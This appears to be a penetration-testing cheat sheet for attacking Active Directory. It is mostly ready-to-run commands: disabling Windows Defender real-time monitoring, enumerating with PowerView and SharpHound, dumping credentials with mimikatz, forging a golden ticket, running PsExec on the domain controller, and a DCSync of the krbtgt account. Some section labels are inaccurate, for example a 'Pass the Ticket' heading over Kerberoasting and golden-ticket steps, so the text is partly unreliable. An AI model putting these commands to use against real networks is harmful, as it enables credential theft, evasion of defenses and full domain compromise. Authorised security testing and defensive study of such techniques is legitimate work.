Active Directory Exploitation
Overview
- Overview
- Enumeration and Exploitation Tools
- Genera Exploitation Pathway Examples
AD: General Pathways
A few of the many exploitation pathways:
- Exploiting a web-app --> lateral movement throughout the network --> domain compromise
- Exploiting a network/service vulnerability --> lateral movement throughout the network --> domain compromise
- Exploiting a client-side attack to compromise a user --> later movement --> domain compromise
Methods:
- Pass-The-Hash
- Pass-The-Ticket
- Overpass-The-Hash
- Kerberoasting
- As-Rep Roasting
- Golden Ticket
- Silver Ticket
- Password Spraying
AD: Enumeration and Assessment
After gaining access to a machine within an AD network, it is essential to enumerate the environment and understand the network, the domain, the machines within it, and where the compromised machine stands in relation to the environment (permissions, groups, routes to admin, etc.).
Enumeration of AD can be done in various ways and many tools exist. Among them, some of the most popular and useful include sharphound/bloodhound, powerview, impacket, and of course, powershell.
Useful Resources:
https://wadcoms.github.io/
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
Tools
- The impacket suite:
- psexec.py
- wmiexec.py
- smbexec.py
- crackmapexec
- powerview
- sharphound / bloodhound
- mimikatz
- pypykatz
- winpeas / windows privescheck
- ldapmonitor
- responder
- rubeus
- kerbrute
Powerview
Disable Monitoring
Set-MpPreference -DisableRealtimeMonitoring $true
Get Domain Info
Get-Domain
Get-DomainController
Get-Domain -Domain domain.local
Get-DomainController -Domain domain.local
Get-DomainUser
Get-DomainSID
Get-DomainPolicy
(Get-DomainPolicy)."SystemAccess"
Invoke-ShareFinder
Invoke-MapDomainTrust
Using Bloodhound
File transfer --> download sharphound --> exfiltrate the data --> view data in bloodhound --> identify valuable accounts or pathways within the domain --> use relevant tools to try to exploit those accounts and move laterally
.\sharphound.exe -c Default, GPOLocalGroup, LoggedOn --zipfilename output
Use mimikatz to find vulnerable accounts with weak passwords to be used for further exploitation:
privilege::debug
sekurlsa::logonPasswords
Pass the Ticket Example
Identify service principals:
- Get-UserSPNs.ps1
Request ticket for vulnerable SPN (this can be done with mimikatz or via powershell):
powershell method:
Add-Type –AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken –ArgumentList ‘SPN'
mimikatz method: After getting an SPN with domain controller access or access for lateral movement: (example - SPN is mssqlserver)
kerberos::purge
kerberos::list
kerberos::ask /target:mssqlserver
kerberos::list /export
kerberos::golden /user:admin /domain:corp.com /sid:S-1-5-21-xxx-xxxx-xxxxx /target:domain.com /service:MSSQLServer /rc4:hash /ptt
Accessing the DC with Admin privileges:
PsExec64.exe \\domain-dc01\ cmd.exe
pushd \\domain-dc01\c$
cd \\domain-dc01\c$
lsaDump::dcsync /user:krbtgt
clsadump::lsa /inject /name:krbtgt